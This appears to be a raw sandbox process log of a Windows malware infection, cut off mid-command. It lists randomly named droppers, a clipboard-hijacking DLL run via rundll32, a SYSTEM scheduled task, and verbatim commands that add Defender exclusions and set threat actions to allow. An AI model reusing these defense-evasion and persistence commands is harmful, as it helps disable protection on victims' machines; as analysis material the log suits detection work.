"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4076 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1656 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\Pictures\O1c4ldHHgJFVg5LLZai7o8Hy.exe
"C:\Users\Admin\Pictures\O1c4ldHHgJFVg5LLZai7o8Hy.exe"
C:\Users\Admin\Pictures\RSM6CiUtofKuWBEZT3YoJA2v.exe
"C:\Users\Admin\Pictures\RSM6CiUtofKuWBEZT3YoJA2v.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\597858682981_Desktop.zip' -CompressionLevel Optimal
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
C:\Users\Admin\Pictures\qOUAgB63FuuHS2R8dK3BVAuF.exe
"C:\Users\Admin\Pictures\qOUAgB63FuuHS2R8dK3BVAuF.exe"
C:\Users\Admin\Pictures\dwH8FokgOu20Z9ZQ360ELUmq.exe
"C:\Users\Admin\Pictures\dwH8FokgOu20Z9ZQ360ELUmq.exe" --silent --allusers=0
C:\Users\Admin\Pictures\dwH8FokgOu20Z9ZQ360ELUmq.exe
C:\Users\Admin\Pictures\dwH8FokgOu20Z9ZQ360ELUmq.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x29c,0x2a0,0x2a4,0x278,0x2a8,0x6bbde1d0,0x6bbde1dc,0x6bbde1e8
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\dwH8FokgOu20Z9ZQ360ELUmq.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\dwH8FokgOu20Z9ZQ360ELUmq.exe" --version
C:\Windows\SysWOW64\sc.exe
Sc delete GameServerClient
C:\Users\Admin\Pictures\dwH8FokgOu20Z9ZQ360ELUmq.exe
"C:\Users\Admin\Pictures\dwH8FokgOu20Z9ZQ360ELUmq.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5072 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240425172628" --session-guid=b200a801-0345-4bac-b0d3-5d2104abafd8 --server-tracking-blob="NGUwYzE0ZTFmYWI3YWNmYzA5ZjFiMDE0OWFhMzg0ODBhNDEzMGIxYzQzZjU3OWExMDYwYzUyNjA5NDM1M2Y0MDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fMTIzIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0MDY1OTc1LjMxOTYiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzEyMyIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiNTAxNDIxMWUtMGExMS00NzYyLWJjMGItYWI4MDYxZDZhYjNjIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=4C04000000000000
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\u4a4.0.exe
"C:\Users\Admin\AppData\Local\Temp\u4a4.0.exe"
C:\Users\Admin\Pictures\dwH8FokgOu20Z9ZQ360ELUmq.exe
C:\Users\Admin\Pictures\dwH8FokgOu20Z9ZQ360ELUmq.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x298,0x2a8,0x2ac,0x274,0x2b0,0x6b0ce1d0,0x6b0ce1dc,0x6b0ce1e8
C:\Users\Admin\Pictures\Btf5cq1Bmhr53WKazgbpOEpg.exe
"C:\Users\Admin\Pictures\Btf5cq1Bmhr53WKazgbpOEpg.exe"
C:\Users\Admin\Pictures\afis2GlxSRlazYtAhh6nmdeH.exe
"C:\Users\Admin\Pictures\afis2GlxSRlazYtAhh6nmdeH.exe" --silent --allusers=0
C:\Users\Admin\Pictures\afis2GlxSRlazYtAhh6nmdeH.exe
C:\Users\Admin\Pictures\afis2GlxSRlazYtAhh6nmdeH.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6a18e1d0,0x6a18e1dc,0x6a18e1e8
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService remove GameServerClient confirm
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\afis2GlxSRlazYtAhh6nmdeH.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\afis2GlxSRlazYtAhh6nmdeH.exe" --version
C:\Users\Admin\AppData\Local\Temp\7zS562A.tmp\Install.exe
.\Install.exe /RvdidblCuX "385118" /S
C:\Users\Admin\AppData\Local\Temp\u52w.0.exe
"C:\Users\Admin\AppData\Local\Temp\u52w.0.exe"
C:\Users\Admin\AppData\Local\Temp\u4a4.2\run.exe
"C:\Users\Admin\AppData\Local\Temp\u4a4.2\run.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Users\Admin\AppData\Local\Temp\u52w.2\run.exe
"C:\Users\Admin\AppData\Local\Temp\u52w.2\run.exe"
C:\Users\Admin\AppData\Local\Temp\u4a4.3.exe
"C:\Users\Admin\AppData\Local\Temp\u4a4.3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 7364 -ip 7364
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5548 -ip 5548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 1616
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7364 -s 1204
C:\Users\Admin\Pictures\uj9zf1WQ2J1PKGLCSCT6a98V.exe
"C:\Users\Admin\Pictures\uj9zf1WQ2J1PKGLCSCT6a98V.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 6584 -ip 6584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6584 -s 1412
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 17:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\MATpqzT.exe\" em /YOsite_idnfL 385118 /S" /V1 /F
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService install GameServerClient "C:\Program Files (x86)\GameServerClient\GameServerClient.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 6112 -ip 6112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 1016
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService start GameServerClient
C:\Program Files (x86)\GameServerClient\GameService.exe
"C:\Program Files (x86)\GameServerClient\GameService.exe"
C:\Program Files (x86)\GameServerClient\GameServerClient.exe
"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"
C:\Windows\Temp\677655.exe
"C:\Windows\Temp\677655.exe" --list-devices
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251726281\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251726281\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installc.bat" "
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251726281\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251726281\assistant\assistant_installer.exe" --version
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251726281\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251726281\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x11b6038,0x11b6044,0x11b6050
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\MATpqzT.exe
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\MATpqzT.exe em /YOsite_idnfL 385118 /S
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\sc.exe
Sc delete GameServerClientC
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService remove GameServerClientC confirm
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v 